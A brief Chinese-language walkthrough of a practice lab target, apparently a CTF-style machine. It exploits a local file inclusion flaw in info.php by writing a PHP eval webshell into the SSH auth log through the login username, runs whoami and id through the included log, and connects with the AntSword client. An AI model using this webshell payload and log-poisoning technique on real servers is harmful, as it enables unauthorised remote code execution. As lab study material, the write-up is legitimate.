首先安装好后扫描ip找到靶场的ip
进来只有一个图片啥也不能干
找到ip后就可以扫描IP的目录文件了
进去访问就可以看到antibots目录
访问这个目录可以看见有好多文件
进来看见有个info.php进来看看
查看页面源代码发现存在文件包含漏洞
然后就有目标了这里读取etc/passwd
利用ssh连接写入木马 ssh '<?php @eval($_POST[qwe])?>'@192.168.248.133 -p2211
访问一句话木马
命令成功执行,说明一句话写入成功
view-source:172.16.1.113/antibot_image/antibots/info.php?image=/var/log/auth.log&jason=whoami
view-source:172.16.1.113/antibot_image/antibots/info.php?image=/var/log/auth.log&jason=id
然后再用蚁剑成功连接
